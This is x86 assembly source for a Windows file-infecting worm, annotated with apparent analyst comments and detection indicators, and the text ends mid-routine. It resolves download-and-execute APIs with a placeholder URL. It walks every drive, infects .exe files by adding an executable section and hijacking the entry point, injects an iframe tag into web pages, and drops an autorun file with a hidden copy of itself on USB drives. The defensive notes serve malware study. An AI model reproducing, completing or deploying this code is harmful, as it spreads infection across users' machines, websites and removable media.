;****************************************************上面这个是搜索全盘所用到数据
InfectionData:
Fir_Sec_Addr dd 0
Kernel32Address DD 0
AppStart dd 0
Vlen dd (offset VirusEnd- offset VirusStart)
ImageBase dd 0
HFcreatefilemapping dd 0
HFmapviewoffile dd 0
sec_align dd 0
file_align dd 0
oldEnd dd 0
oldEip dd 0
NewIp dd 0
PE_Head dd 0
FileHandle dd 0
Now_Sec_Addr dd 0
SetJmpOepsize dd (offset SetJmpOepEnd- offset SetJmpOep)
OepData dd 0
Cur_Sec_Addr dd 0
WriteAddr dd 0
;****************************************************上面这个是感染PE文件所用到数据
WebPageSpreadData:
GuaMa db '</iframe>',0 ;替换XX里的数据为挂马的代码
WriteData dd 0
ReadData dd 0
SpreadWebPageH dd 0
;****************************************************上面这个是感染网页所用到数据
OtherData:
InfectedFlag db 0
DownedName db 'c:\windows\system32\exefix.exe',0
DownName db 'http://xxxxxxxxx/xx.exe',0;建议 最好给下扩展名
DownloaderFlag db 'C:\windows\KB962412.txt',0
DllnameUrl db 'urlmon.dll',0
DllNameUser db 'user32.dll',0
;***************************************************************************************************************其他数据
Begin:
GetAPIAddr:
lea esi,[ebp+szCopyFileA]
call GetFunctionAddress
mov [ebp+_CopyFileA],eax
lea esi,[ebp+szGetModuleFileNameA]
call GetFunctionAddress
mov [ebp+_GetModuleFileNameA],eax
lea esi,[ebp+szLoadLibraryA]
call GetFunctionAddress
mov [ebp+_LoadLibraryA],eax
lea esi,[ebp+szFreeLibrary]
call GetFunctionAddress
mov [ebp+_FreeLibrary],eax
lea esi,[ebp+szReadFile]
call GetFunctionAddress
mov [ebp+_ReadFile],eax
lea esi,[ebp+szWriteFile]
call GetFunctionAddress
mov [ebp+_WriteFile],eax
lea esi,[ebp+szSetFileAttributesA]
call GetFunctionAddress
mov [ebp+_SetFileAttributesA],eax
lea esi,[ebp+szGetProcAddress]
call GetFunctionAddress
mov [ebp+_GetProcAddress],eax
lea esi,[ebp+szGetDriveTypeA]
call GetFunctionAddress
mov [ebp+_GetDriveType],eax
lea esi,[ebp+szCloseHandle]
call GetFunctionAddress
mov [ebp+_CloseHandle],eax
lea esi,[ebp+szCreateFileA]
call GetFunctionAddress
mov [ebp+_CreateFileA],eax
lea esi,[ebp+szCreateFileMappingA];
call GetFunctionAddress
mov [ebp+_CreateFileMappingA],eax
lea esi,[ebp+szMapViewOfFile]
call GetFunctionAddress
mov [ebp+_MapViewOfFile],eax
lea esi,[ebp+szSetEndOfFile]
call GetFunctionAddress
mov [ebp+_SetEndOfFile],eax
lea esi,[ebp+szSetFilePointer]
call GetFunctionAddress
mov [ebp+_SetFilePointer],eax
lea esi,[ebp+szUnmapViewOfFile]
call GetFunctionAddress
mov [ebp+_UnmapViewOfFile],eax
lea esi,[ebp+szExitProcess]
call GetFunctionAddress
mov [ebp+_ExitProcess],eax
lea esi, [ebp+szFindFirstFileA]
call GetFunctionAddress
mov [ebp+_FindFirstFileA], eax
lea esi, [ebp+szFindNextFileA]
call GetFunctionAddress
mov [ebp+_FindNextFileA], eax
lea esi,[ebp+szFindClose]
call GetFunctionAddress
mov [ebp+_FindClose],eax
lea esi,[ebp+szGetFileSize];
call GetFunctionAddress
mov [ebp+_GetFileSize],eax
lea esi,[ebp+szSetCurrentDirectoryA]
call GetFunctionAddress
mov [ebp+_SetCurrentDirectoryA],eax
lea esi,[ebp+szGetCurrentDirectoryA]
call GetFunctionAddress
mov [ebp+_GetCurrentDirectoryA],eax
lea esi,[ebp+DllnameUrl]
push esi
call [ebp+_LoadLibraryA]
lea esi,[ebp+szURLDownloadToFile]
push esi
push eax
call [ebp+_GetProcAddress]
mov [ebp+_URLDownloadToFile],eax ;失败就退出 这个函数是用来下载的
lea esi,[ebp+szWinExec]
call GetFunctionAddress
mov [ebp+_WinExec],eax
lea esi,[ebp+DllNameUser]
push esi
call [ebp+_LoadLibraryA]
lea esi,[ebp+szwsprintfA]
push esi
push eax
call [ebp+_GetProcAddress]
mov [ebp+_wsprintfA],eax
;************************************************************需要的函数已经找到了*************************************************************************
@Next:
Spread:
;-----------------------------------------------------------------------
; Spread: drive-letter loop.
; CurrentDir holds a root path whose first byte is the drive letter
; (presumably "X:\", see the 3-byte copies in SearchFiles/WriteAuto).
; Each pass asks GetDriveTypeA what the volume is and dispatches:
;   DRIVE_FIXED (3)     -> SpreadExeFile  (file-system walk, see below)
;   DRIVE_REMOVABLE (2) -> SpreadUDisk    (autorun drop, see WriteAuto)
; The letter is then incremented and the loop repeats until 'z' has
; been handled, after which control continues at GoToWork2 (payload).
; Clobbers: eax, esi, flags; mutates the first byte of CurrentDir.
; Analyst note: probing every drive letter with GetDriveTypeA and
; special-casing removable volumes is the usual removable-media worm
; pattern; a burst of GetDriveTypeA/FindFirstFileA across all letters
; from an unexpected process is a useful behavioural indicator.
;-----------------------------------------------------------------------
lea esi,[ebp+CurrentDir]                ; lpRootPathName (author: "fixed disk or USB stick?")
push esi
call [ebp+_GetDriveType]
cmp eax,3                               ; DRIVE_FIXED (author: "if it is a hard disk")
jnz NOTDISK
call SpreadExeFile                      ; walk the volume
NOTDISK:
cmp eax,2                               ; DRIVE_REMOVABLE (author: "if it is a USB stick")
jnz ADDDISK
call SpreadUDisk                        ; drop autorun + host copy
;any other drive type is skipped and the loop moves on
ADDDISK:
cmp byte ptr [ebp+CurrentDir],'z'       ; last drive letter handled?
jz GoToWork2                            ; yes: the loop is finished
inc byte ptr [ebp+CurrentDir]           ; 'c' -> 'd' -> ... (author: at most 26 passes, up to Z)
jmp Spread
SpreadExeFile:
;-----------------------------------------------------------------------
; SpreadExeFile: run SearchFiles for a fixed drive.
; SearchFiles overwrites the CurrentDir dword (it stores a pointer to
; cSubDir there while descending), so the 4-byte root string is parked
; on the stack and restored afterwards. Assumes DF is clear (forward
; movsd). Clobbers esi, edi plus whatever SearchFiles clobbers.
;-----------------------------------------------------------------------
sub esp,4
lea esi,[ebp+CurrentDir]
mov edi,esp
movsd                                   ; save the CurrentDir dword
call SearchFiles                        ; (author: "start searching")
lea edi,[ebp+CurrentDir]
mov esi,esp
movsd                                   ; restore it
add esp,4
ret
SpreadUDisk:
; Removable-drive branch of Spread: delegates to WriteAuto.
call WriteAuto
ret
;************************************************************************main routine: file-system walk***************************************************************
SearchFiles:
;-----------------------------------------------------------------------
; SearchFiles: depth-first walk of the drive named by CurrentDir.
; There is no real recursion; the caller's stack is used as an explicit
; directory stack. Layout, top of stack first:
;   0BBBBBBBBh     level separator, pushed above the entries of the
;                  previous listing when a new listing starts saving
;   32-byte name   one entry per subdirectory found in a listing
;   ...
;   'refV'         bottom sentinel (pushed first, popped last)
; State (all ebp-relative):
;   CurrentDir  first pass: the "X:\" root string itself;
;               afterwards: a POINTER to cSubDir (selected by SearchFlag)
;   SearchFlag  0 on the first pass for this drive, 1 once cSubDir is used
;   cSubDir     path of the directory currently being visited
;   FoundFlag   set when a listing is exhausted so the next saved
;               directory gets a separator above it
;   FoundNum    number of subdirectories saved from the current listing
;   FirstFind   depth counter, incremented on every descent
; Each directory is entered with SetCurrentDirectoryA and listed with
; FindFirstFileA/FindNextFileA on SearchString (author: "*.*").
; For a regular file the name is scanned for '.', and the extension
; dispatches to InfectFiles (.exe/.EXE) or SpreadWebPage (.htm/.asp/
; .php/.html). The scan is bounded by a 0BBh byte planted at name+250.
; Clobbers: eax, ebx, ecx, edx, esi, edi, flags.
; Analyst note: the full-volume FindFirstFileA("*.*") walk with
; SetFileAttributesA + in-place rewrites of .exe and web files is the
; behaviour to monitor; file-integrity monitoring on web roots covers
; SpreadWebPage, and the PE marker documented at InfectFiles covers the
; .exe side.
;-----------------------------------------------------------------------
SearchFirst:
sub esp,4
mov dword ptr [esp],'refV'              ; bottom-of-stack sentinel (author: "an infection marker"; here it only marks the stack bottom)
SearchSec:
lea esi,[ebp+cDir]                      ; receive buffer (author: 260 bytes)
push esi
push 128h                               ; nBufferLength
call [ebp+_GetCurrentDirectoryA]
mov esi,[ebp+CurrentDir]                ; pointer form of CurrentDir (valid once SearchFlag != 0)
cmp byte ptr [ebp+SearchFlag],0         ; first pass on this drive?
jnz SearchBegin                         ; no: esi already points at cSubDir
lea esi,[ebp+CurrentDir]                ; yes: CurrentDir is the root string itself
push esi
lea edi,[ebp+cSubDir]
mov ecx,3
rep movsb                               ; seed cSubDir with the 3-byte root
pop esi
SearchBegin:
push esi                                ; lpPathName (author: "select the drive")
call [ebp+_SetCurrentDirectoryA]        ; enter the directory to be listed
lea esi,[ebp+win32_find_data]
push esi                                ; lpFindFileData
lea edx,[ebp+SearchString]
push edx                                ; lpFileName (author: "*.*")
call [ebp+_FindFirstFileA]
mov [ebp+FindHandle],eax                ; keep the search handle
inc eax
jz SearchClose                          ; INVALID_HANDLE_VALUE (-1): nothing to list, leave
dec eax
SearchAgian:
cmp byte ptr [ebp+win32_find_data.FullFileName],'.' ; "." / ".." (and any dot-prefixed name) are skipped
jz SearchNext
cmp [ebp+win32_find_data.FileAttributes],10h ; FILE_ATTRIBUTE_DIRECTORY alone -> remember for descent
jz SaveDir
cmp [ebp+win32_find_data.FileAttributes],16h ; DIRECTORY|SYSTEM|HIDDEN -> skipped (author: "system directory")
jz SearchNext
cmp [ebp+win32_find_data.FileAttributes],11h ; DIRECTORY|READONLY -> skipped
jz SearchNext
cmp [ebp+win32_find_data.FileAttributes],30h ; DIRECTORY|ARCHIVE -> remember for descent
jz SaveDir
;everything else is treated as a file: locate its extension
search:
mov byte ptr [ebp+win32_find_data.FullFileName+250],0BBH ; terminator for the scan below
xor ecx,ecx
search2E:
inc cl                                  ; ecx = index into the file name
cmp byte ptr [ebp+win32_find_data.FullFileName+ecx],0BBH
jz SearchNext                           ; hit the planted terminator: no '.' found
cmp byte ptr [ebp+win32_find_data.FullFileName+ecx],'.'
jnz search2E
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'exe.' ; ".exe" (dword constant, little-endian in memory)
jnz SearchEXE
pushad
call InfectFiles                        ; PE infector (see below)
popad
SearchEXE:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'EXE.' ; ".EXE"
jnz SearchHTM
pushad
call InfectFiles
popad
SearchHTM:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'mth.' ; ".htm"
jnz SearchASP
pushad
call SpreadWebPage                      ; web-page payload (see below)
popad
SearchASP:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'psa.' ; ".asp"
jnz SearchPHP
pushad
call SpreadWebPage
popad
SearchPHP:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'php.' ; ".php"
jnz SearchHTML
pushad
call SpreadWebPage
popad
SearchHTML:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx+1],'lmth' ; "html" following the dot
jnz SearchNext
pushad
call SpreadWebPage
popad
jmp SearchNext
SaveDir:
;push this subdirectory's name (first 32 bytes) onto the directory stack
cmp byte ptr [ebp+FoundFlag],0
jz SaveDir@
sub esp,4
mov dword ptr [esp],0BBBBBBBBH          ; new level: separator above the previous level's entries
SaveDir@:
sub esp,20h
mov edi,esp
lea esi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb                               ; save the directory name
mov byte ptr [ebp+FoundFlag],0
inc byte ptr [ebp+FoundNum]
SearchNext:
lea ebx,[ebp+win32_find_data]
push ebx
push [ebp+FindHandle]
call [ebp+_FindNextFileA]
or eax,eax
jnz SearchAgian                         ; more entries in this listing
;listing exhausted: decide where to go next
mov byte ptr [ebp+FoundFlag],1          ; the next saved directory will open a new level
cmp dword ptr [esp],'refV'              ; stack empty -> the whole drive is done
jz FixedBeforeSearchHandleClose
cmp dword ptr [esp],0BBBBBBBBH          ; separator on top -> this level is finished, go up
jz UpDir
mov esi,esp
lea edi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb                               ; pop a saved name into FullFileName
add esp,20h
cmp byte ptr [ebp+FoundNum],0           ; nothing saved from the listing just finished?
jz UpDir1                               ; -> it is a sibling: strip the last path component first
cmp byte ptr [ebp+FirstFind],2
jb SetNewDir
mov byte ptr [ebp+FoundNum],0
jmp SetNewDir
UpDir1:
;strip the last component of cSubDir: scan back from cSubDir+98 for '\'
xor ecx,ecx
Check_:
cmp byte ptr [ebp+cSubDir+98+ecx],05ch  ; '\'
jz Find_
add ecx,-1
jmp Check_
Find_:
mov byte ptr [ebp+cSubDir+98+ecx],0     ; terminate at the backslash (author: "everything keys off the NUL")
lea edi,[ebp+cSubDir+98+ecx]
mov ecx,30h
xor eax,eax
rep stosb                               ; clear the 48 bytes from there on
lea edi,[ebp+cSubDir]
mov [ebp+CurrentDir],edi                ; CurrentDir -> cSubDir (pointer form)
jmp SetNewDir
UpDir:
add esp,4                               ; drop the separator
cmp dword ptr [esp],'refV'              ; nothing below it -> done
jz FixedBeforeSearchHandleClose
xor ecx,ecx
Check_1:
cmp byte ptr [ebp+cSubDir+98+ecx],05ch  ; find the last '\'
jz Find_1
add ecx,-1
jmp Check_1
Find_1:
add ecx,-1
cmp byte ptr [ebp+cSubDir+98+ecx],05ch  ; then the one before it
jnz Find_1
mov byte ptr [ebp+cSubDir+98+ecx],0     ; cSubDir is now one level up
cmp dword ptr [esp],0BBBBBBBBH          ; another separator -> go up one more level
jnz Find_3
add esp,4
cmp dword ptr [esp],'refV'              ; stack empty -> done
jz FixedBeforeSearchHandleClose
Find_2:
add ecx,-1
cmp byte ptr [ebp+cSubDir+98+ecx],05ch  ; previous '\'
jnz Find_2
mov byte ptr [ebp+cSubDir+98+ecx],0
cmp dword ptr [esp],0BBBBBBBBH
jnz Find_3
add esp,4
cmp dword ptr [esp],'refV'              ; stack empty -> done
jz FixedBeforeSearchHandleClose
jmp Find_2
Find_3:
lea edi,[ebp+cSubDir+98+ecx]
mov ecx,30h
xor eax,eax
rep stosb                               ; clear the tail of cSubDir
lea edi,[ebp+cSubDir]
mov [ebp+CurrentDir],edi
mov esi,esp
lea edi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb                               ; pop the saved name into FullFileName
add esp,20h                             ; (author: "take the directory out, then enter it")
;lea esi,[ebp+win32_find_data.FullFileName]
;mov ecx,20h
;rep movsb
;mov byte ptr [ebp+SearchFlag],1
;jmp SearchSec
SetNewDir:
;cSubDir = wsprintfA(lpFormat, <parent dir>, FullFileName); cdecl, four arguments
lea edx,[ebp+win32_find_data.FullFileName]
push edx                                ; pushed first: the subdirectory name
mov esi,[ebp+CurrentDir]                ; pointer form ...
cmp byte ptr [ebp+SearchFlag],0
jnz IsDir
LEA esi,[ebp+CurrentDir]                ; ... or the inline root string on the first pass
IsDir:
push esi                                ; the parent directory
lea edx,[ebp+lpFormat]
push edx                                ; format string (contents not visible here)
lea edx,[ebp+cSubDir]
push edx                                ; output buffer
call [ebp+_wsprintfA]
add esp,10h                             ; caller cleans up (cdecl)
lea eax,[ebp+cSubDir]
mov [ebp+CurrentDir],eax                ; from now on CurrentDir is a pointer to cSubDir
mov byte ptr [ebp+SearchFlag],1
lea eax,[ebp+cSubDir]
mov [ebp+CurrentDir],eax
inc byte ptr [ebp+FirstFind]            ; one level deeper
mov byte ptr [ebp+FoundNum],0
jmp SearchSec                           ; list the new directory
FixedBeforeSearchHandleClose:
add esp,4                               ; drop the 'refV' sentinel
SearchHandleClose:
push dword ptr[ebp+FindHandle]
call [ebp+_FindClose]
SearchClose:
ret
;*******************************************************************end of the file-system walk**********************************************************************
WriteAuto:
;-----------------------------------------------------------------------
; WriteAuto: removable-media dropper.
; Builds two paths from the 3-byte root held in CurrentDir:
;   autoexec     root + AutoexecName (12 bytes; author: "Autoexec.inf")
;   USpreadName  receives AutoexecEXEname (12 bytes; the executable name)
; then opens the first path with OpenFile (OPEN_EXISTING, read/write),
; writes 55 bytes from szWirte into it, closes it and sets
; HIDDEN|SYSTEM on it; finally GetModuleFileNameA(NULL) obtains the
; running host's path and CopyFileA copies it to USpreadName.
; Clobbers: eax, ecx, edx, esi, edi, flags. Assumes DF is clear.
; Analyst note: an autorun-style .inf written to a DRIVE_REMOVABLE root
; together with a hidden/system copy of the host is the classic
; USB-worm signature. AutoRun for removable media is disabled by
; default on supported Windows versions, and an unexpected
; hidden/system .inf at a drive root is a cheap thing to alert on.
;-----------------------------------------------------------------------
;removable-drive spreading code (author)
;the existing file is simply overwritten (author)
xor edi,edi
lea edi,[ebp+autoexec]                  ; destination path buffer (author: "a blank area")
lea esi,[ebp+CurrentDir]
push 03h
pop ecx
rep movsb                               ; copy the 3-byte root
push edi                                ; remember where the file name goes
lea edi,[ebp+USpreadName]
rep movsb
lea esi,[ebp+AutoexecEXEname]
push 0ch
pop ecx
rep movsb                               ; 12 bytes: executable file name -> USpreadName
pop edi                                 ; back to autoexec, right after the root
xor esi,esi
lea esi,[ebp+AutoexecName]
push 0ch
pop ecx
rep movsb                               ; 12 bytes: autorun file name -> autoexec
lea esi,[ebp+autoexec]
call OpenFile                           ; CreateFileA(..., OPEN_EXISTING) (author: "create the Autoexec.inf file")
inc eax
test eax,eax
jz WriteAutoClose                       ; INVALID_HANDLE_VALUE
dec eax
mov [ebp+WriteAutoHandle],eax
push 0                                  ; lpOverlapped
push [ebp+WriteData]                    ; lpNumberOfBytesWritten slot
push 55                                 ; nNumberOfBytesToWrite (author: "byte count")
lea edx,[ebp+szWirte]
push edx                                ; lpBuffer: the autorun text
push eax                                ; hFile
call [ebp+_WriteFile]                   ; (author: "rewriting from the start, so no seek is needed")
push [ebp+WriteAutoHandle]
call [ebp+_CloseHandle]
;now set the file attributes (author)
push 6                                  ; FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
push edx
call [ebp+_SetFileAttributesA]
push 32h                                ; nSize = 50
lea esi,[ebp+UDiskBuffer]
push esi                                ; lpFilename
push 0                                  ; hModule = NULL: the running executable
call [ebp+_GetModuleFileNameA]
test eax,eax                            ; (author: "error?")
jz WriteAutoClose                       ; (author: "on failure, leave")
push 0                                  ; bFailIfExists = FALSE
lea esi,[ebp+USpreadName]
push esi                                ; lpNewFileName
lea esi,[ebp+UDiskBuffer]
push esi                                ; lpExistingFileName
call [ebp+_CopyFileA]                   ; copy the host onto the removable drive
WriteAutoClose:
ret
;**************************************************************************end of the removable-media routine************************************************************
SpreadWebPage:
;-----------------------------------------------------------------------
; SpreadWebPage: appends the 9-byte GuaMa ("web trojan") payload to the
; web file named in win32_find_data.FullFileName.
; Steps as written: SetFileAttributesA(NORMAL) so the file is writable;
; OpenFileE (OPEN_ALWAYS, read/write); seek to FileSizeLow-9 and
; ReadFile 9 bytes into GuaMa (author's intent: notice an existing
; marker and skip); seek to FILE_END and WriteFile 9 bytes from GuaMa;
; close.
; In:  win32_find_data filled by SearchFiles. Clobbers eax, ecx, esi.
; Analyst note: this is a content-integrity problem for web roots; a
; monitor that diffs .htm/.html/.asp/.php files, or response scanning
; for injected frame/script tags, is the practical detection.
;-----------------------------------------------------------------------
;web-page spreading code (author)
;author: first check whether the file ends with the </frame> text; if it does the file is already infected and we leave, otherwise write it
lea esi,[ebp+win32_find_data.FullFileName]
push 80H                                ; FILE_ATTRIBUTE_NORMAL
push esi
call [ebp+_SetFileAttributesA]          ; (author: "set the attributes first")
call OpenFileE                          ; esi = file name
mov [ebp+SpreadWebPageH],eax
inc eax
test eax,eax
jz SpreadError                          ; INVALID_HANDLE_VALUE
;position 9 bytes before the end
mov ecx,dword ptr [ebp+win32_find_data.FileSizeLow]
sub ecx,9                               ; (author: "the marker takes 9 characters")
push 1                                  ; dwMoveMethod = FILE_CURRENT (position is 0 right after open)
xor eax,eax
push eax                                ; lpDistanceToMoveHigh = NULL
push ecx                                ; lDistanceToMove
push [ebp+SpreadWebPageH]
call [ebp+_SetFilePointer]
;read the tail (author: "look for the marker")
push 0                                  ; lpOverlapped
lea esi,[ebp+ReadData]
push esi                                ; lpNumberOfBytesRead
push 9
lea esi,[ebp+GuaMa]
push esi                                ; lpBuffer = GuaMa
push [ebp+SpreadWebPageH]
call [ebp+_ReadFile]
test eax,eax
jz SpreadClose                          ; ReadFile returned FALSE (author's note: "found -> leave")
;append the payload (author: "the injection code starts here")
push 2                                  ; dwMoveMethod = FILE_END
xor eax,eax
push eax
push eax
push [ebp+SpreadWebPageH]
call [ebp+_SetFilePointer]
push 0                                  ; lpOverlapped
lea esi,[ebp+WriteData]
push esi                                ; lpNumberOfBytesWritten
;***************************************************an assumption is made here (author)
push 9                                  ; payload size (author: "X is the size of the injected data")
;******************************************************************
lea esi,[ebp+GuaMa]
push esi                                ; lpBuffer
push [ebp+SpreadWebPageH]
call [ebp+_WriteFile]
;write finished (author)
SpreadClose:
push [ebp+SpreadWebPageH]
call [ebp+_CloseHandle]
SpreadError:
ret
;*************************************************************************end of the web-page routine**************************************************************
InfectFiles:
;-----------------------------------------------------------------------
; InfectFiles: appending PE infector for the .exe named in
; win32_find_data.FullFileName.
; Steps, as written:
;  1. SetFileAttributesA(NORMAL); OpenFile (OPEN_EXISTING, read/write).
;  2. CreateFileMappingA(PAGE_READWRITE, FileSizeLow + 1000h) and
;     MapViewOfFile(FILE_MAP_WRITE): the file is edited in place.
;  3. Check "MZ" and "PE"; if TimeDateStamp already equals the 'vfer'
;     marker the file is considered infected and left alone.
;  4. Zero DataDirectory[11] (bound import); record SectionAlignment,
;     FileAlignment and ImageBase+AddressOfEntryPoint (oldEip).
;  5. Require NumberOfSections <= 8. Pick section 0 or 2 (RDTSC & 2),
;     require slack between VirtualSize and SizeOfRawData, choose a
;     random non-zero offset into it that leaves 5 bytes, and require
;     the dword there to be zero.
;  6. Add a section header: Name = spaces, VirtualSize = Vlen,
;     Characteristics = 0E0000020h (CNT_CODE|EXECUTE|READ|WRITE),
;     VirtualAddress / SizeOfRawData rounded up to the alignments,
;     PointerToRawData = previous PointerToRawData + SizeOfRawData.
;  7. Write the E9 opcode from SetJmpOep plus a rel32 to the new
;     section into the slack, point AddressOfEntryPoint at it, round
;     SizeOfImage up, stamp TimeDateStamp with 'vfer'.
;  8. Copy Vlen bytes from VirusStart to the new section's raw data,
;     SetFilePointer/SetEndOfFile to the new length, unmap and close.
; Clobbers: all general registers except ebp/esp, and the ebp-relative
; scratch words PE_Head, sec_align, file_align, oldEip, Fir_Sec_Addr,
; Cur_Sec_Addr, OepData, WriteAddr, Now_Sec_Addr, NewIp, oldEnd.
; Error paths jump to error_MapFile / error_CreateMap / error_Final
; (after GoToWork), which release what has been acquired and ret.
; Detection indicators a scanner or triage script can key on:
;   - IMAGE_FILE_HEADER.TimeDateStamp == 'vfer' (bytes "refv" on disk);
;   - a last section whose name is spaces with 0E0000020h
;     characteristics (writable + executable code);
;   - AddressOfEntryPoint inside section 0 or 2 but beyond that
;     section's VirtualSize (file slack), holding an E9 jmp into the
;     last section;
;   - bound-import directory zeroed while other directories are intact.
; Mitigation notes: code signing / file-integrity monitoring detect the
; rewrite; the return to the host (GoBack) uses the absolute
; ImageBase+EntryPoint recorded here, so an ASLR-relocated host would
; not be resumed correctly.
;-----------------------------------------------------------------------
lea esi,[ebp+win32_find_data.FullFileName]
push 80H                                ; FILE_ATTRIBUTE_NORMAL
push esi
call [ebp+_SetFileAttributesA]
call OpenFile                           ; esi = file name -> eax = handle
mov [ebp+FileHandle],eax
inc eax
test eax,eax
jz error_Final                          ; INVALID_HANDLE_VALUE
mov ecx,dword ptr [ebp+win32_find_data.FileSizeLow]
add ecx,01000h                          ; map the file plus 4 KiB of growth room
push ecx
call CreateMap                          ; ecx = mapping size
test eax,eax
jz error_CreateMap
mov [ebp+HFcreatefilemapping],eax
pop ecx
call MapFile                            ; ecx = bytes to map
test eax,eax
jz error_MapFile
mov [ebp+HFmapviewoffile],eax
Injection:
xchg esi,eax                            ; esi = view base (file offset 0)
cmp word ptr [esi],5A4Dh                ; "MZ"
jnz error_MapFile
add esi,[esi+3ch]                       ; e_lfanew -> IMAGE_NT_HEADERS
cmp word ptr [esi],4550h                ; "PE"
jnz error_MapFile
cmp dword ptr [esi+08h],'vfer'          ; TimeDateStamp doubles as the infection marker
jz @Close                               ;has been infect
mov [ebp+PE_Head],esi
push 0h
pop dword ptr [esi+0d0h]                ; DataDirectory[11] (bound import).VirtualAddress = 0
push 0h
pop dword ptr[esi+0d4h]                 ; DataDirectory[11].Size = 0
mov ebx, dword ptr[esi+38h]             ; OptionalHeader.SectionAlignment
mov [ebp+sec_align],ebx
mov edi,dword ptr [esi+3ch]             ; OptionalHeader.FileAlignment
mov [ebp+file_align],edi
mov ebx,dword ptr [esi+28h]             ; AddressOfEntryPoint
add ebx,[esi+34h]                       ; + ImageBase = absolute VA of the original entry point
mov [ebp+oldEip],ebx                    ; lies inside the body copied in step 8; read back at GoBack
movzx ebx,word ptr [esi+14h]            ; SizeOfOptionalHeader
lea eax,[esi+ebx+18h]                   ; first IMAGE_SECTION_HEADER
movzx ecx,word ptr [esi+06h]            ; NumberOfSections
cmp ecx,8
ja @Close                               ; more than 8 sections: not handled
xchg esi,eax
mov dword ptr [ebp+Fir_Sec_Addr],esi
;****************************************************************************************************************************
;First i check if program had been packed
;*******************************************************************************************************************************
RandNum:
RDTSC                                   ; timestamp counter as a cheap random source
and eax,00000002h                       ; eax = 0 or 2
xchg eax,ecx
imul ecx,ecx,28h                        ; * sizeof(IMAGE_SECTION_HEADER)
add esi,ecx                             ; esi -> section 0 or section 2
mov dword ptr [ebp+Cur_Sec_Addr],esi
mov ebx,dword ptr [esi+08h]             ; VirtualSize
mov edx,dword ptr [esi+0ch]             ; VirtualAddress
add edx,ebx
mov dword ptr [ebp+OepData],edx         ; RVA just past the section's used data
mov edx,dword ptr [esi+10h]             ; SizeOfRawData
sub edx,dword ptr [esi+08h]             ; slack = SizeOfRawData - VirtualSize
js error_MapFile                        ; negative: no slack (the author's "packed" heuristic)
mov edi,dword ptr [esi+14h]             ; PointerToRawData
add edi,dword ptr [esi+08h]             ; + VirtualSize
add edi,dword ptr [ebp+HFmapviewoffile] ; -> start of the slack inside the mapped view
sub edx,5                               ; keep room for a 5-byte jmp
RandData:
push edx
RDTSC
pop edx
AND eax,edx                             ; random value masked to <= edx
test eax,eax
jz RandData                             ; must be non-zero
mov edx,dword ptr [ebp+OepData]
add edx,eax
mov dword ptr[ebp+OepData],edx          ; RVA where the jmp will be planted (future entry point)
add edi,eax
mov dword ptr [ebp+WriteAddr],edi       ; its address in the view
cmp dword ptr [edi],00000000h
jnz error_MapFile                       ; the slack must be zero-filled there
;***********************************************************
; ok if the program hadnt packed i append a section
;**************************************************************
mov esi,dword ptr [PE_Head]
movzx ecx,word ptr[esi+06h]             ; old NumberOfSections
inc word ptr [esi+06h]                  ; NumberOfSections++
imul ecx,ecx,28h
mov esi,dword ptr [ebp+Fir_Sec_Addr]
add esi,ecx                             ; esi -> the new (last) section header slot
mov dword ptr [ebp+Now_Sec_Addr],esi
mov dword ptr[esi],'    '               ; Name = spaces
mov ebx,dword ptr[ebp+Vlen]
mov dword ptr [esi+08h],ebx             ; VirtualSize = virus body length
mov dword ptr [esi+24h],0e0000020h      ; Characteristics: CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE
;VirtualAddress = previous VirtualAddress + previous VirtualSize rounded up to SectionAlignment
mov eax,dword ptr [esi-28h+08h]         ; previous section's VirtualSize
mov ebx,dword ptr[ebp+sec_align]
cmp eax,ebx
xor ecx,ecx
jb @1                                   ; smaller than one alignment unit: use one unit
@@@@1:
push eax
sub eax,ebx
js @@@@2
inc ecx                                 ; count whole alignment units
pop eax
sub eax,dword ptr [ebp+sec_align]
jmp @@@@1
@@@@2:
pop eax
inc ecx                                 ; one more for the remainder
mov eax,dword ptr [ebp+sec_align]
mul ecx                                 ; eax = units * SectionAlignment
xchg eax,ebx
@1:
add ebx,dword ptr [esi-28h+0ch]         ; + previous VirtualAddress
mov dword ptr [esi+0ch],ebx             ; new VirtualAddress
@@1:
mov dword ptr [ebp+NewIp],ebx
;SizeOfRawData = Vlen rounded up to FileAlignment (same loop shape as above)
mov eax,dword ptr [ebp+Vlen]
mov ebx,dword ptr [ebp+file_align]
xor ecx,ecx
cmp eax,ebx
jb @2
@@@@3:
push eax
sub eax,ebx
js @@@@4
inc ecx
pop eax
sub eax,dword ptr [ebp+file_align]
jmp @@@@3
@@@@4:
pop eax
inc ecx
mov eax,dword ptr [ebp+file_align]
mul ecx
xchg eax,ebx
@2:
mov dword ptr [esi+10h],ebx             ; new SizeOfRawData
@@2:
mov eax,dword ptr [esi-28h+14h]         ; previous PointerToRawData
mov ebx,dword ptr [esi-28h+10h]         ; previous SizeOfRawData
add eax,ebx
mov dword ptr [esi+14h],eax             ; new PointerToRawData = end of the previous section's raw data
mov [ebp+oldEnd],eax                    ; file offset where the body will be appended
;******************************************************************************************************************************************************
;Here i set "JMP xxxxxxxx" in the space where alway no data in it
; however, you also can set other data or code in it if the area have enough space
;******************************************************************************************************************************************************
RandSetData:
mov edi,dword ptr [ebp+WriteAddr]       ; haha a joke
mov esi,offset SetJmpOep                ; template holding the E9 opcode
mov ecx,[ebp+SetJmpOepsize]             ; its length (defined elsewhere in the file)
cld
rep movsb                               ; edi now points just past the opcode
mov edx,dword ptr [ebp+OepData]
add edx,5                               ; RVA of the instruction after the jmp
mov esi,dword ptr [ebp+Now_Sec_Addr]
mov ebx,dword ptr [esi+0ch]             ; new section's VirtualAddress
sub ebx,edx                             ; rel32 displacement
mov dword ptr [edi],ebx                 ; complete the jmp
mov eax,dword ptr [ebp+PE_Head]
mov ebx,dword ptr [ebp+OepData]
mov dword ptr [eax+28h],ebx             ; AddressOfEntryPoint -> the planted jmp
;SizeOfImage = (SizeOfImage + Vlen) rounded up to SectionAlignment
mov ebx,[eax+50h]                       ; SizeOfImage
add ebx,[ebp+Vlen]
